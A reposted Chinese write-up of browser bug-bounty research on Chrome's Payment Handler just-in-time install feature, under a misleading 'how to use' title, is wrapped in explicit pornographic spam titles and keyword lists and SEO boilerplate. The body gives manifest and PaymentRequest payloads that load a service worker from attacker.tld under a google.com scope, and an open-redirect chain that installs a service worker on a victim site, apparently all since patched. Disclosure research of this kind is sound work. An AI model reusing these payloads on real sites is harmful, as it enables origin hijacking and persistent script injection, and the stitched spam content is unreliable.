欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

如何在Chrome中使用即時支付功能

這篇文章將為大家詳細(xì)講解有關(guān)如何在Chrome中使用即時支付功能,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

創(chuàng)新互聯(lián)建站專注于廣東企業(yè)網(wǎng)站建設(shè),自適應(yīng)網(wǎng)站建設(shè),成都做商城網(wǎng)站。廣東網(wǎng)站建設(shè)公司,為廣東等地區(qū)提供建站服務(wù)。全流程按需策劃,專業(yè)設(shè)計,全程項目跟蹤,創(chuàng)新互聯(lián)建站專業(yè)和態(tài)度為您提供的服務(wù)

當(dāng)時我在研究Chrome支付處理API(PaymentHandler API)的時候,我發(fā)現(xiàn)了下面這句話:Chrome還支持一個非標(biāo)準(zhǔn)功能,我們將其命名為’及時安裝功能’(JIT)。

非常好,這名字一聽起來就感覺像存在bug的。所以我趕緊對這個功能的工作機(jī)制進(jìn)行了研究【參考資料】。首先,支付處理API允許支付服務(wù)提供商處理發(fā)送給他們的支付請求,那支付App的JIT安裝功能又是什么呢?具體我就不解釋了,請大家接著往下看。

當(dāng)客戶端使用服務(wù)器不支持的方法來調(diào)用支付請求的時候,也就是下面這樣:

new PaymentRequest([{ supportedMethods: 'https://example.com/pay/' }], { ... });

Chrome將會從服務(wù)器支持的方法中獲取一個特定的URL地址,用于獲取地址的頁面需要以包含下列響應(yīng)Header(指向Payment MethodManifest)的響應(yīng)信息來響應(yīng)客戶端的請求:

Link:<https://example.com/pay/payment-manifest.json>;rel="payment-method-manifest"

接下來,Chrome將會獲取之前所定義的Payment Method Manifest,文件的大致內(nèi)容如下所示:

{"default_applications": ["https://example.com/pay/web-app-manifest.json"],"supported_origins": ["https://example.com"] }

然后,Chrome將會獲取之前所定義的Web App Manifest,該文件的內(nèi)容大致如下:

{
  "name": "Pay withExample",
  ....
  "serviceworker": {
    "src":"service-worker.js",
    "scope":"https://example.com/pay/"
  },
  ...
}

Chrome將會用一個指向“src”和“scope”值的JavaScript文件來注冊Service Worker,這里是JIT安裝過程中用戶可以點(diǎn)擊“支付”按鈕的一種情況:

如何在Chrome中使用即時支付功能

幸運(yùn)的是,頁面內(nèi)的“支付”按鈕默認(rèn)設(shè)置為聚焦的,所以我們就可以想辦法讓目標(biāo)用戶按住回車鍵3秒鐘,這樣我們就可以觸發(fā)JIT安裝功能了。你注意到上圖中有些什么奇怪的地方了嗎?沒錯,支付App的源似乎來自www.google.com。為什么呢?原來我們可以用Service Worker腳本來指定Web App Manifest中“scope”參數(shù)的值,也就是可以設(shè)置任意值:

{
  "name": "Pay toAttacker",
  ....
  "serviceworker": {
    "src": "https://attacker.tld/service-worker.js",
    "scope":"https://www.google.com/"
  },
  ...
}

盡管如此,這里還是存在一些問題,因為Service Worker仍然會存有攻擊者網(wǎng)站的源地址,即使攻擊者注冊的是Google服務(wù)范圍內(nèi)的地址。我這里沒辦法攔截導(dǎo)航/支付請求,但是我可以使用Console API這樣的API來進(jìn)行數(shù)據(jù)分析,而當(dāng)用戶訪問了google.com的控制臺之后,Console API可以記錄用戶的任意數(shù)據(jù)。

這個漏洞跟UXSS非常相似,但是我沒辦法成功利用,因為我不應(yīng)該使用Data URL腳本。當(dāng)時我將該漏洞上報給Google之后,他們在兩天內(nèi)修復(fù)了該漏洞(Chrome 68禁用了JIT安裝功能),并提供了5000美金的漏洞獎勵。

這個過程中我還注意到了另一個問題,其實我們根本不需要在目標(biāo)站點(diǎn)內(nèi)執(zhí)行腳本來觸發(fā)JIT安裝功能。也就是說,假設(shè)攻擊者的站點(diǎn)中托管了如下所示的腳本內(nèi)容:

new PaymentRequest([{ supportedMethods: 'https://attacker.tld/' }], { ... });

Chrome將會獲取服務(wù)器不支持的方法,響應(yīng)信息的響應(yīng)Header如下:

Link:<https://attacker.tld/payment-manifest.json>;rel="payment-method-manifest"

接下來,Chrome將會以下列方式獲取Payment Method Manifest:

{"default_applications":["https://victim.tld/user-upload/web-app-manifest.json"],"supported_origins": "*" }

現(xiàn)在,Chrome會從目標(biāo)站點(diǎn)獲取Web App Manifest,這個Web App Manifest能夠以任意Content-Type或Content-Disposition進(jìn)行響應(yīng)。有的人可能會想,“是不是可以用Cross-originNo-CORS來請求一個JSON文件呢?CORB會不會禁用這種請求方式呢?”沒錯,這種請求響應(yīng)的確會被屏蔽,

盡管如此,Chrome仍會繼續(xù)獲取上述的Web App Manifest內(nèi)容:

{
  "name": "Pay toAttacker",
  ....
  "serviceworker": {
    "src":"https://victim.tld/user-upload/service-worker.js",
    "scope":"https://victim.tld/user-upload/"
  },
  ...
}

Service Worker腳本的Content-Type必須為JavaScript,但如果使用Content-Disposition的話就無所謂了。

總的來說,如果你能夠向目標(biāo)站點(diǎn)上傳文件的話,你就可以在不需要執(zhí)行任何腳本的情況下安裝Service Worker了(持久型XSS)。這很明顯又是一個漏洞,上報之后我又拿到了3000美金…

所以,第一個漏洞通過檢測Web App Manifest、Service Worker腳本和Scope URL是否同源來成功修復(fù),第二個漏洞通過檢測Payment Method Manifest和支付App是否在同一網(wǎng)站來成功修復(fù)。那么接下來,我們繼續(xù)嘗試Hack!

攻擊者的網(wǎng)站調(diào)用下列方法:

new PaymentRequest([{ supportedMethods:'https://redirect.victim.tld/open-redirect?url=//attacker.tld/' }], { ... });

Chrome獲取不支持的方法兵重定向至攻擊者的網(wǎng)站,響應(yīng)信息的響應(yīng)Header如下:

Link:<https://victim.tld/user-upload/payment-manifest.json>;rel="payment-method-manifest"

接下來還是跟之前一樣,我們只需要向目標(biāo)站點(diǎn)上傳文件(Payment Method Manifest),如果目標(biāo)站點(diǎn)開啟了開放重定向功能的話,這樣就能夠繞過所有的安全檢測,因為目標(biāo)站點(diǎn)中的Service Worker并不需要執(zhí)行任何腳本。

當(dāng)然了,這個漏洞在兩天之后已經(jīng)修復(fù)了,然后我又拿到了3133.7美金(7毛是什么鬼?)。

最后,完整的JIT支付App在Chrome 69中正式上線。

關(guān)于如何在Chrome中使用即時支付功能就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

網(wǎng)站名稱:如何在Chrome中使用即時支付功能
文章轉(zhuǎn)載:http://aaarwkj.com/article12/iipdgc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站改版、網(wǎng)站排名、動態(tài)網(wǎng)站、企業(yè)網(wǎng)站制作、營銷型網(wǎng)站建設(shè)、網(wǎng)站設(shè)計公司

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

搜索引擎優(yōu)化
日本一级黄色影视大全| 亚洲精品区免费观看av| 高清白嫩学生自拍视频| 91欧美一区二区在线视频| 精品人妻一区二区三区蜜桃电| 国产一区二区三区在线看片| 欧美日韩黄片免费在线观看| 日韩一区二区高清看片| 手机黄色av免费在线网址 | 国产黄a三级三级三级老师绑| 美女午夜福利一区二区| 亚洲一区二区三区不卡视频| 午夜福利视频在线一区| 日本伦理三级在线观看| 成人黄色av在线看| 18禁污污网站国产| 亚洲国产精品一区二区三区| 人妻少妇被猛烈进入文字幕| 一区二区亚洲欧美精品| 欧美日韩黄片免费在线观看| 99热这里只有精品免费播放| 91欧美日韩国产在线观看| 欧美熟女av在线观看| 精品国产美女主播在线| 亚洲成人国产一区二区| 国产精品青青草原在线| 国产精品日韩理论在线| 国产日韩手机在线不卡视频| 欧美午夜国产在线观看| 国产av毛片一区二区| 夜夜草av一区二区三区| 一二三四在线观看日本资讯| 我的极品小姨在线观看| 国产91精品在线观看| 亚洲激情人妻小说网| 老牛av一区二区三区| 国产女片xb内射在线| 久久综激情丁香开心婷婷| av黄色在线播放网页| 国产精品国产三级区别| 日韩最新视频一区二区三|